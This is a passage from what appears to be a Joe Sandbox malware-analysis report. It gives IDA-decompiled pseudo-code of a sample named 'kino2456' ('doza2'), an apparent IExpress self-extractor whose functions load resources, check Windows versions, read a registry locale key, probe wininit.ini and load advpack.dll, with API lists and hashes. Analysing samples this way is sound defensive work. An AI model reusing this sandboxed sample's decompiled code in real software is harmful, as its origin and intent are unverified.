						_t7 = _t41 + 1; // 0xa
						 *0xfca288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E00FC171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00FC6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

0x00fc6298
0x00fc62a0
0x00fc62a7
0x00fc62ad
0x00fc62af
0x00fc62bb
0x00fc62c3
0x00fc62c4
0x00fc633b
0x00fc633b
0x00fc6345
0x00fc634d
0x00000000
0x00000000
0x00fc62da
0x00fc62de
0x00fc635f
0x00fc6369
0x00fc62e0
0x00fc62e0
0x00fc62e0
0x00fc62e3
0x00fc62e5
0x00fc62e5
0x00fc62e8
0x00fc62e8
0x00fc62ea
0x00fc62eb
0x00fc62ef
0x00fc62f1
0x00fc62f3
0x00fc6302
0x00fc6308
0x00fc630d
0x00fc6314
0x00fc6314
0x00fc6316
0x00fc6319
0x00fc6355
0x00fc6357
0x00fc631b
0x00fc631b
0x00fc6331
0x00fc6334
0x00fc6339
0x00000000
0x00fc6339
0x00fc6319
0x00fc636b
0x00fc637d
0x00fc637d
0x00000000

APIs

Part of subcall function 00FC171E: _vsnprintf.MSVCRT ref: 00FC1750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00FC51CA,00000004,00000024,00FC2F71,?,00000002,00000000), ref: 00FC62CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00FC51CA,00000004,00000024,00FC2F71,?,00000002,00000000), ref: 00FC62D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00FC51CA,00000004,00000024,00FC2F71,?,00000002,00000000), ref: 00FC631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00FC6345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00FC51CA,00000004,00000024,00FC2F71,?,00000002,00000000), ref: 00FC6357

Strings

UPDFILE%lu, xrefs: 00FC62B3, 00FC6329

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: 596c0c4425da448784fafae6a4626260f64f6981f315bd95e8199413d6c24629
Instruction ID: fc58e1b5c55627d948a96cdf9892e539b398ff3987a258e6a1fc026364172332
Opcode Fuzzy Hash: 596c0c4425da448784fafae6a4626260f64f6981f315bd95e8199413d6c24629
Instruction Fuzzy Hash: A821D271A0421EABDB109FA48E4BEFE7B78FB45714B14011DF902E3241DB359906ABE1

Uniqueness

Uniqueness Score: -1.00%

Function 00FC681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00FC681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t19 ^ _t44;
				_t41 =  *0xfc81d8; // 0x0
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0xfc81d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0xfc81d8; // 0x0
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0xfc1140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E00FC66F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0xfc81d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E00FC6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}

0x00fc681f
0x00fc682a
0x00fc6831
0x00fc6836
0x00fc683c
0x00fc683e
0x00fc6848
0x00fc6851
0x00fc685d
0x00fc6864
0x00fc6876
0x00fc693a
0x00fc693a
0x00fc687c
0x00fc687e
0x00fc6885
0x00000000
0x00fc68d6
0x00fc68f4
0x00fc6900
0x00fc6902
0x00fc690a
0x00000000
0x00fc690c
0x00fc690c
0x00fc691c
0x00000000
0x00fc691e
0x00fc6924
0x00fc692b
0x00fc6932
0x00000000
0x00000000
0x00000000
0x00fc692b
0x00fc691c
0x00fc690a
0x00fc6885
0x00fc6876
0x00fc6951

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00FC686E
GetSystemMetrics.USER32(0000004A), ref: 00FC68A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00FC68CC
RegQueryValueExA.ADVAPI32(?,00FC1140,00000000,?,?,0000000C), ref: 00FC68F4
RegCloseKey.ADVAPI32(?), ref: 00FC6902

Part of subcall function 00FC66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00FC691A), ref: 00FC6741

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00FC68C2

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-1109908249
Opcode ID: 1ff67c9a6d402955777b5e36f29dc24d23fc3f63640436990014dba1c8e3396c
Instruction ID: 51e5b321646163da265808a9efb912873a2af21888bc398ec130304394d9ce80
Opcode Fuzzy Hash: 1ff67c9a6d402955777b5e36f29dc24d23fc3f63640436990014dba1c8e3396c
Instruction Fuzzy Hash: 5F316431E0422D9FDB21CB11CE46FAAB7B8FB85768F0401A9E949E7140DB309D85EF52

Uniqueness

Uniqueness Score: -1.00%

Function 00FC3A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC3A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E00FC468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0xfc8d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E00FC468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0xfc8d4c, "<None>") == 0) {
							LocalFree( *0xfc8d4c);
							L9:
							 *0xfc9124 = 0;
							return 1;
						}
						_t9 = E00FC6517(_t19, 0x7d1, 0, E00FC3100, 0, 0);
						LocalFree( *0xfc8d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0xfc9124 = 0x800704c7;
						L2:
						return 0;
					}
					E00FC44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0xfc8d4c);
					 *0xfc9124 = 0x80070714;
					goto L2;
				}
				E00FC44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0xfc9124 = E00FC6285();
				goto L2;
			}

0x00fc3a46
0x00fc3a57
0x00fc3a5d
0x00fc3a63
0x00fc3a6a
0x00fc3a91
0x00fc3a9a
0x00fc3ad8
0x00fc3b13
0x00fc3b19
0x00fc3b1b
0x00000000
0x00fc3b21
0x00fc3ae7
0x00fc3af4
0x00fc3afc
0x00000000
0x00000000
0x00fc3afe
0x00fc3a87
0x00000000
0x00fc3a87
0x00fc3aa8
0x00fc3ab3
0x00fc3ab9
0x00000000
0x00fc3ab9
0x00fc3a78
0x00fc3a82
0x00000000

APIs

Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46A0
Part of subcall function 00FC468F: SizeofResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46A9
Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46C3
Part of subcall function 00FC468F: LoadResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46CC
Part of subcall function 00FC468F: LockResource.KERNEL32(00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46D3
Part of subcall function 00FC468F: memcpy_s.MSVCRT ref: 00FC46E5
Part of subcall function 00FC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00FC2F64,?,00000002,00000000), ref: 00FC3A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00FC3AB3

Part of subcall function 00FC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FC4518
Part of subcall function 00FC44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00FC4554

Part of subcall function 00FC6285: GetLastError.KERNEL32(00FC5BBC), ref: 00FC6285

lstrcmpA.KERNEL32(<None>,00000000), ref: 00FC3AD0
LocalFree.KERNEL32 ref: 00FC3B13

Part of subcall function 00FC6517: FindResourceA.KERNEL32(00FC0000,000007D6,00000005), ref: 00FC652A
Part of subcall function 00FC6517: LoadResource.KERNEL32(00FC0000,00000000,?,?,00FC2EE8,00000000,00FC19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00FC6538
Part of subcall function 00FC6517: DialogBoxIndirectParamA.USER32(00FC0000,00000000,00000547,00FC19E0,00000000), ref: 00FC6557
Part of subcall function 00FC6517: FreeResource.KERNEL32(00000000,?,?,00FC2EE8,00000000,00FC19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00FC6560

LocalFree.KERNEL32(00000000,00FC3100,00000000,00000000), ref: 00FC3AF4

Strings

<None>, xrefs: 00FC3AC5
LICENSE, xrefs: 00FC3A46

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: 4ae35c9e389a6545b86fa36c8e44870a0fbdbaf0542b2647fa49c6330e1f45a5
Instruction ID: 595251474f6fb8e00867ffd2b1d6f074aec47fe0670631aa9f00c4135661fc0b
Opcode Fuzzy Hash: 4ae35c9e389a6545b86fa36c8e44870a0fbdbaf0542b2647fa49c6330e1f45a5
Instruction Fuzzy Hash: C611067660020AABD724AF32AF0BF1779B9EBC5790B10802EB542D71A1DA7D9C10B721

Uniqueness

Uniqueness Score: -1.00%

Function 00FC24E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00FC24E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E00FC658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00FC6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}

0x00fc24e0
0x00fc24eb
0x00fc24f2
0x00fc24f7
0x00fc2504
0x00fc250e
0x00fc251d
0x00fc252c
0x00fc2541
0x00fc2546
0x00fc2553
0x00fc2555
0x00fc2555
0x00fc2546
0x00fc256c

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00FC2506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00FC252C
_lopen.KERNEL32(?,00000040), ref: 00FC253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 00FC254C
_lclose.KERNEL32(00000000), ref: 00FC2555

Strings

wininit.ini, xrefs: 00FC2510

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: 7f14184d7af3953a3b7ed43888ae5d16896e1de4b243660f071ebe291718c89a
Instruction ID: a08bcba15411cc0595b657952e4ebf026e3224599309b9d328c2acb2cb3360a7
Opcode Fuzzy Hash: 7f14184d7af3953a3b7ed43888ae5d16896e1de4b243660f071ebe291718c89a
Instruction Fuzzy Hash: 9A01F536A4011C67C7209B659E0EEDFBB7CEB457A0F000168FA49D3190DE749E45DA91

Uniqueness

Uniqueness Score: -1.00%

Function 00FC36EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00FC36EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0xfc8184 = 1;
						 *0xfc8180 = 1;
						L13:
						 *0xfc9a40 = _t119;
						L14:
						__eflags =  *0xfc8a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00FC2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00FC2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0xfc8a38 & 0x00000001;
											if(( *0xfc8a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("doza2");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E00FC681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "doza2", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E00FC67C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E00FC28E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0xfc9a40 = _t119;
						 *0xfc8184 = 1;
						 *0xfc8180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0xfc9a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0xfc8184 = _t135;
							 *0xfc8180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E00FC44B9(0, _t138);
					L66:
					return E00FC6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}

0x00fc36f9
0x00fc3700
0x00fc370c
0x00fc3716
0x00fc3718
0x00fc371b
0x00fc3721
0x00fc372b
0x00fc373d
0x00fc3745
0x00fc3746
0x00fc3746
0x00fc3749
0x00fc37ab
0x00fc37ad
0x00fc37ae
0x00fc37b3
0x00fc37b8
0x00fc37b8
0x00fc37bf
0x00fc37bf
0x00fc37c5
0x00000000
0x00000000
0x00fc37cb
0x00fc37cd
0x00000000
0x00000000
0x00fc37d5
0x00fc37db
0x00fc37e8
0x00fc37ea
0x00fc37ea
0x00fc37ea
0x00fc37f0
0x00fc37f6
0x00fc3805
0x00fc3817
0x00fc382b
0x00fc3830
0x00fc3836
0x00fc383b
0x00fc383d
0x00fc38eb
0x00fc38eb
0x00fc38f2
0x00fc390c
0x00fc3911
0x00fc3911
0x00fc3913
0x00fc394d
0x00fc394d
0x00fc394f
0x00fc38a9
0x00fc38a9
0x00fc38b0
0x00fc38b2
0x00fc38b9
0x00fc38bb
0x00fc38c1
0x00fc3975
0x00fc38c7
0x00fc38de
0x00fc38e0
0x00fc38e0
0x00fc397b
0x00fc397d
0x00fc39a9
0x00fc397f
0x00fc3982
0x00fc398b
0x00fc398d
0x00fc398f
0x00fc399f
0x00fc39a1
0x00fc3991
0x00fc3991
0x00fc3991
0x00fc398f
0x00fc39af
0x00fc39b6
0x00fc3a0f
0x00fc3a0f
0x00fc3a11
0x00fc3a13
0x00fc3a19
0x00000000
0x00fc39b8
0x00fc39b8
0x00fc39ba
0x00000000
0x00000000
0x00fc39bc
0x00fc39bf
0x00000000
0x00000000
0x00fc39c3
0x00fc39c9
0x00fc39ce
0x00fc39d0
0x00fc39e3
0x00fc39e5
0x00fc39e6
0x00fc39f1
0x00fc39f7
0x00fc39fa
0x00fc3a01
0x00fc3a04
0x00000000
0x00000000
0x00fc3a06
0x00fc3a09
0x00fc3a09
0x00fc3a0b
0x00fc3a0b
0x00000000
0x00fc3a09
0x00fc39fc
0x00000000
0x00fc39fc
0x00fc39d3
0x00fc39d8
0x00fc39da
0x00000000
0x00000000
0x00000000
0x00fc39dc
0x00fc39b6
0x00fc3955
0x00fc395b
0x00000000
0x00000000
0x00fc3961
0x00fc3963
0x00000000
0x00000000
0x00fc3969
0x00fc3969
0x00000000
0x00fc3969
0x00fc3915
0x00fc3915
0x00fc391b
0x00fc391f
0x00000000
0x00000000
0x00fc392d
0x00fc3933
0x00fc3938
0x00fc393a
0x00000000
0x00000000
0x00fc3940
0x00fc3946
0x00fc394b
0x00000000
0x00fc394b
0x00000000
0x00fc38f2
0x00fc3843
0x00fc3845
0x00000000
0x00000000
0x00fc384b
0x00fc384d
0x00fc3883
0x00fc3885
0x00000000
0x00000000
0x00fc389a
0x00fc389e
0x00fc389e
0x00000000
0x00000000
0x00fc38a0
0x00fc38a0
0x00fc38a2
0x00000000
0x00000000
0x00fc38a4
0x00000000
0x00fc38a4
0x00fc384f
0x00fc3851
0x00fc3857
0x00fc386e
0x00fc3877
0x00fc387b
0x00000000
0x00000000
0x00000000
0x00fc3881
0x00fc3859
0x00fc385c
0x00fc3862
0x00fc3866
0x00000000
0x00000000
0x00fc3868
0x00000000
0x00fc38f4
0x00fc38f4
0x00fc38f5
0x00fc38fb
0x00fc3901
0x00fc3901
0x00000000
0x00fc390a
0x00fc374b
0x00fc374e
0x00fc375c
0x00fc3764
0x00fc3769
0x00fc376e
0x00fc3771
0x00fc379c
0x00fc379f
0x00000000
0x00000000
0x00fc37a3
0x00fc37a4
0x00000000
0x00fc37a4
0x00fc3773
0x00fc3777
0x00fc3778
0x00fc377f
0x00fc3781
0x00fc378e
0x00fc378e
0x00fc3794
0x00000000
0x00fc3794
0x00fc3783
0x00000000
0x00000000
0x00fc3785
0x00fc378c
0x00000000
0x00000000
0x00000000
0x00fc378c
0x00fc3750
0x00000000
0x00fc372d
0x00fc372d
0x00fc396b
0x00fc396b
0x00fc396c
0x00fc396e
0x00fc396f
0x00fc3a1e
0x00fc3a1e
0x00fc3a22
0x00fc3a27
0x00fc3a3e
0x00fc3a3e

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00FC3723
MessageBeep.USER32(00000000), ref: 00FC39C3
MessageBoxA.USER32(00000000,00000000,doza2,00000030), ref: 00FC39F1

Strings

doza2, xrefs: 00FC39E9, 00FC3A19
3, xrefs: 00FC3785

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$doza2
API String ID: 2519184315-2054879145
Opcode ID: 09f6cd1ae90be5e677f26b77f697ac85f0ed59be294c836a4a09e45f6a595c6d
Instruction ID: 413a0c71654437a5b31aaa859bef6875b2b6c72fd902c12892d06408d51fdbc4
Opcode Fuzzy Hash: 09f6cd1ae90be5e677f26b77f697ac85f0ed59be294c836a4a09e45f6a595c6d
Instruction Fuzzy Hash: CC910372E052269BDB348A15CF83FAA73B1AF45394F1580ADD84A97281D7748F81FF01

Uniqueness

Uniqueness Score: -1.00%

Function 00FC6495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00FC6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00FC1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
				_t26 = "advpack.dll";
				E00FC658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
